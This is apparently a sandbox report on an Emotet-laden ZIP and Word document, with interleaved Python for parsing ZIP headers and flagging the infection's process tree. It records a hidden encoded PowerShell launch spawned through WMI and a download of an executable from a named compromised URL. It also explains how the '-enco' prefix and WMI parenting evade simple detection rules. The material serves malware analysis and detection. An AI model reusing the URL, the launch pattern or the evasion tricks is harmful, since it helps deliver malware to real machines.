| Field | Value |
|---|---|
| File name | 519151c96a283d0c4de78e62bcc60533.zip |
| Full analysis | https://app.any.run/tasks/02787b0b-1881-4536-9852-3c1c4a7dceec |
| Verdict | Malicious activity |
| Threats | Emotet is one of the most dangerous trojans ever created. Over its lifetime it has been upgraded into very destructive malware. It targets mostly corporate victims, but private users are also infected through mass spam email campaigns. |
| Analysis date | November 17, 2019, 00:02:47 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/zip |
| File info | Zip archive data, at least v2.0 to extract |
| MD5 | 1D5619DA6155C1500A8799AFD3042C91 |
| SHA1 | 6FCF27BD20615EB2F24E7319ECDCE40546B709C6 |
| SHA256 | FABFCA8CB61E48C8848B04002B817EF1B4E001FEFEE40F52A881BAA80BE367A5 |
| SSDEEP | 3072:/zGJzmF9HLSh85GTq91BTKod6C+9WcKDGUPpdA73Jh0WKlPp1Y:/z99rW85GTCBma+UaUPM1DKJ4 |
| Extension | Description |
|---|---|
| .zip | ZIP compressed archive (100) |

| Field | Value |
|---|---|
| ZipRequiredVersion | 20 |
| ZipBitFlag | 0x0009 |
| ZipCompression | Deflated |
| ZipModifyDate | 2019:11:15 10:40:15 |
| ZipCRC | 0xba58db94 |
| ZipCompressedSize | 131249 |
| ZipUncompressedSize | 203804 |
| ZipFileName | 519151c96a283d0c4de78e62bcc60533 |
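The ZIP metadata above is what a parser reads from the archive's central directory. The value worth a second look is ZipBitFlag 0x0009: per the ZIP specification (APPNOTE.TXT 4.4.4) that sets bit 0, which marks the entry as encrypted, and bit 3, which means the CRC and sizes live in a data descriptor after the compressed data, so the local file header carries zeros for them and only the central directory has the real values. The report itself does not say whether a password was supplied to WinRAR. The following Python is an added example, not part of the ANY.RUN report: it builds one central-directory entry from the values in the table (the archive payload is not embedded, and the timestamp is 10:40:14 because DOS timestamps have two-second granularity) and decodes it; `iter_central_entries` also walks real archives if you pass the central-directory offset from the EOCD record.

```python
"""Decode a ZIP central-directory entry, including the general-purpose bit flag.

Added example, not part of the ANY.RUN report. The entry is constructed
inline from the values in the report's ZIP metadata table (version 20,
flag 0x0009, Deflated, CRC 0xba58db94, sizes 131249/203804, file name
519151c96a283d0c4de78e62bcc60533); the archive contents are not embedded.
"""
import struct
from datetime import datetime

CENTRAL_SIG = 0x02014B50
# APPNOTE.TXT 4.3.12: central directory file header, 46 fixed bytes
CENTRAL_FMT = "<IHHHHHHIIIHHHHHII"
CENTRAL_LEN = struct.calcsize(CENTRAL_FMT)  # 46

COMPRESSION = {0: "Stored", 8: "Deflated", 12: "BZIP2", 14: "LZMA", 99: "AES"}

# APPNOTE.TXT 4.4.4: general purpose bit flag
FLAG_BITS = {
    0: "encrypted",           # entry is marked as (password) encrypted
    3: "data_descriptor",     # CRC/sizes follow the data; local header has zeros
    5: "patched_data",
    6: "strong_encryption",
    11: "utf8_names",
    13: "central_dir_encrypted",
}


def dos_datetime(dos_date: int, dos_time: int) -> datetime:
    """MS-DOS packed date/time; seconds are stored divided by 2."""
    return datetime(
        ((dos_date >> 9) & 0x7F) + 1980, (dos_date >> 5) & 0x0F, dos_date & 0x1F,
        (dos_time >> 11) & 0x1F, (dos_time >> 5) & 0x3F, (dos_time & 0x1F) * 2,
    )


def flag_names(flags: int) -> list:
    return [FLAG_BITS.get(b, f"bit{b}") for b in range(16) if (flags >> b) & 1]


def parse_central_entry(data: bytes, off: int = 0) -> dict:
    """Parse one central-directory entry at `off` and return decoded fields."""
    (sig, made_by, needed, flags, method, mtime, mdate, crc, csize, usize,
     nlen, xlen, clen, _disk, _iattr, _eattr, lh_off) = struct.unpack_from(CENTRAL_FMT, data, off)
    if sig != CENTRAL_SIG:
        raise ValueError(f"no central directory header at offset {off}")
    name_off = off + CENTRAL_LEN
    name = data[name_off:name_off + nlen].decode("utf-8" if flags & (1 << 11) else "cp437")
    return {
        "filename": name,
        "version_made_by": made_by,
        "version_needed": f"{needed // 10}.{needed % 10}",
        "flags": flags,
        "flag_names": flag_names(flags),
        "compression": COMPRESSION.get(method, f"method {method}"),
        "modified": dos_datetime(mdate, mtime),
        "crc32": f"0x{crc:08x}",
        "compressed_size": csize,
        "uncompressed_size": usize,
        "local_header_offset": lh_off,
        "next": name_off + nlen + xlen + clen,  # offset of the following entry
    }


def iter_central_entries(data: bytes, start: int):
    """Walk consecutive entries from `start` (normally read from the EOCD record)."""
    off = start
    while off + CENTRAL_LEN <= len(data) and struct.unpack_from("<I", data, off)[0] == CENTRAL_SIG:
        entry = parse_central_entry(data, off)
        yield entry
        off = entry["next"]


def sample_entry() -> bytes:
    """Central-directory entry built from the report's metadata (constructed)."""
    name = b"519151c96a283d0c4de78e62bcc60533"
    mdate = ((2019 - 1980) << 9) | (11 << 5) | 15   # 2019-11-15
    mtime = (10 << 11) | (40 << 5) | (14 // 2)      # 10:40:14 (2 s granularity)
    return struct.pack(
        CENTRAL_FMT, CENTRAL_SIG, 20, 20, 0x0009, 8, mtime, mdate,
        0xBA58DB94, 131249, 203804, len(name), 0, 0, 0, 0, 0x20, 0,
    ) + name


if __name__ == "__main__":
    for e in iter_central_entries(sample_entry(), 0):
        print(e)
```

A mail gateway or sandbox that only reads local file headers sees zero sizes and no CRC for an entry with bit 3 set, and cannot inspect the content at all when bit 0 is set without the password, which is why both flags are worth alerting on for archives arriving by e-mail.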
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 2416 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\519151c96a283d0c4de78e62bcc60533.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Version: 5.60.0 |
| 1412 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\519151c96a283d0c4de78e62bcc60533.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 3792 | powershell -w hidden -enco [base64 command removed] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 2260 | "C:\Users\admin\956.exe" | C:\Users\admin\956.exe | — | powershell.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
| 2256 | --37547278 | C:\Users\admin\956.exe | | 956.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
| 2196 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 956.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
| 1536 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | serialfunc.exe | User: admin; Integrity Level: MEDIUM |
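The process table is the whole infection chain: the archive opened in WinRAR, the extracted .doc opened in Word, a hidden encoded PowerShell whose parent is wmiprvse.exe rather than WINWORD.EXE (consistent with the macro creating the process through WMI, which defeats a naive "Office spawned PowerShell" rule), a payload written directly into the user's profile root, relaunched with an argument of the form --<8 hex digits>, then copied to %LOCALAPPDATA%\serialfunc\serialfunc.exe and relaunched the same way. Note also that powershell.exe accepts any unambiguous prefix of -EncodedCommand, so the -enco here slips past rules that only match -e or -enc. The following Python is an added example, not ANY.RUN's or anyone else's detection content: it encodes those four relationships as rules and runs them over process-creation events constructed from this table plus one benign control. The event field names, the placeholder base64 after -enco (the real command was not available) and the benign event are assumptions; map Sysmon event 1 or EDR fields onto ProcEvent.

```python
"""Flag the process-tree pattern from this report in process-creation events.

Added example, not ANY.RUN code. The events are constructed to mirror the
report's process table (same PIDs, images, parents and arguments; the
base64 after -enco is a placeholder), plus one benign PowerShell launch.
Field names are an assumption: map Sysmon event 1 or EDR fields onto ProcEvent.
"""
import re
from dataclasses import dataclass

OFFICE_OR_WMI = {"winword.exe", "excel.exe", "powerpnt.exe", "wmiprvse.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SELF_RELAUNCH_ARG = re.compile(r"^--[0-9a-f]{8}$")
# <drive>:\users\<user>\<name>.exe, i.e. dropped directly in the profile root
USER_ROOT_EXE = re.compile(r"^[a-z]:\\users\\[^\\]+\\[^\\]+\.exe$")
# %LOCALAPPDATA%\<name>\<name>.exe: folder named after the binary
LOCALAPPDATA_COPY = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\([^\\]+)\\\1\.exe$")


@dataclass
class ProcEvent:
    pid: int
    parent_image: str  # full path of the parent process image
    image: str         # full path of the new process image
    cmdline: str


def _base(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def _args(cmdline: str) -> list:
    # Whitespace split is enough for the command lines in this report; real
    # telemetry needs a proper Windows argv splitter (quoted paths with spaces).
    return [a.strip('"') for a in cmdline.split()]


def is_encoded_flag(tok: str) -> bool:
    """powershell.exe takes any unambiguous prefix of -EncodedCommand (-e, -enc, -enco, ...) and -ec."""
    t = tok.lower()
    return t == "-ec" or (len(t) >= 2 and "-encodedcommand".startswith(t))


def is_hidden_window(args: list) -> bool:
    """-WindowStyle (any prefix, e.g. -w) followed by Hidden or its enum value 1."""
    for i in range(len(args) - 1):
        t = args[i].lower()
        if len(t) >= 2 and "-windowstyle".startswith(t) and args[i + 1].lower() in ("hidden", "1"):
            return True
    return False


def classify(ev: ProcEvent) -> list:
    img, parent, args = _base(ev.image), _base(ev.parent_image), _args(ev.cmdline)
    hits = []
    if img == "powershell.exe" and parent in OFFICE_OR_WMI and any(map(is_encoded_flag, args)):
        hits.append("office/wmi-spawned hidden encoded PowerShell" if is_hidden_window(args)
                    else "office/wmi-spawned encoded PowerShell")
    if parent in SCRIPT_HOSTS and USER_ROOT_EXE.match(ev.image.lower()):
        hits.append("script host launched executable from user profile root")
    if img == parent and len(args) == 1 and SELF_RELAUNCH_ARG.match(args[0].lower()):
        hits.append("self-relaunch with --<8 hex> argument")
    if USER_ROOT_EXE.match(ev.parent_image.lower()) and LOCALAPPDATA_COPY.match(ev.image.lower()):
        hits.append("profile-root dropper started its copy under %LOCALAPPDATA%")
    return hits


def scan(events) -> dict:
    return {ev.pid: classify(ev) for ev in events}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
DROPPER = r"C:\Users\admin\956.exe"
COPY = r"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"


def sample_events() -> list:
    """Constructed from the report's process table; 4242 is a benign control."""
    return [
        ProcEvent(2416, r"C:\Windows\explorer.exe", r"C:\Program Files\WinRAR\WinRAR.exe",
                  r'"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\519151c96a283d0c4de78e62bcc60533.zip"'),
        ProcEvent(1412, r"C:\Windows\explorer.exe", WORD,
                  r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\519151c96a283d0c4de78e62bcc60533.doc"'),
        ProcEvent(3792, r"C:\Windows\System32\wbem\wmiprvse.exe", PS, "powershell -w hidden -enco QQBBAEEA"),
        ProcEvent(2260, PS, DROPPER, f'"{DROPPER}"'),
        ProcEvent(2256, DROPPER, DROPPER, "--37547278"),
        ProcEvent(2196, DROPPER, COPY, f'"{COPY}"'),
        ProcEvent(1536, COPY, COPY, "--d6864438"),
        ProcEvent(4242, r"C:\Windows\explorer.exe", PS, r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"),
    ]


if __name__ == "__main__":
    for pid, hits in scan(sample_events()).items():
        print(pid, hits or "-")
```

The four rules fire on exactly the five malicious PIDs in the table (3792, 2260, 2256, 2196, 1536) and stay silent on WinRAR, Word and the benign PowerShell launch; in production the self-relaunch and %LOCALAPPDATA% copy rules are the ones most likely to need an allow-list, since some installers behave similarly.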
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2416 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2416.190\519151c96a283d0c4de78e62bcc60533 | — | — | — |
| 1412 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR52E8.tmp.cvr | — | — | — |
| 3792 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JOU56J5V873IOM60JM0H.temp | — | — | — |
| 1412 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\354514A0.wmf | wmf | 171303DC3930EB190A479F0BF168DC51 | D13FBD6D2845C86A10606DBBEA213C877FA2A91CFAE062F3AB80CEB92FCF2AEE |
| 3792 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
| 1412 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A93014.wmf | wmf | A3FD11D57534C005278F8253C9F5A070 | E68D01289B6A47B9711D87842D278B358ED600DFC0CBB41B9F2BFF03C1680FCD |
| 1412 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18A5E796.wmf | wmf | CAC34AA383C4B1324D9501FAF6472157 | 7484554AD5E5016FB2F1EF334E5911FF6CCF75631EBF05B860C5E6D50CEB0BC6 |
| 1412 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C715342.wmf | wmf | 0A6E23C95BA9C5562814462340730E3D | 002A1474CAC1AD926D0CCCE118676729A1C52A2279AC48315A406C208176C76F |
| 1412 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 539725821C2778DB09CDC8B1F0A1B7C0 | 6BF60AF34F220A77232A500E230B2AD60A6FE264282029FDA4B7D3E8C999AD07 |
| 1412 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 305C648BF28A8D36B309D77BBEFD9C1E | 00627E7EF37CDD7C929338D3631A0C5EDA1C1551B5878AAD802238768FC7D4D4 |
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 3792 | powershell.exe | GET | 200 | 35.240.206.54:80 | http://www.nestbloom.tw/wp-includes/jg9209ttb-ebshh9ll-1346/ | US | executable | 232 KB | suspicious |

| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 3792 | powershell.exe | 35.240.206.54:80 | www.nestbloom.tw | — | US | suspicious |

| Domain | IP | Reputation |
|---|---|---|
| www.nestbloom.tw | | suspicious |

| PID | Process | Class | Message |
|---|---|---|---|
| 3792 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
| 3792 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
| 3792 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |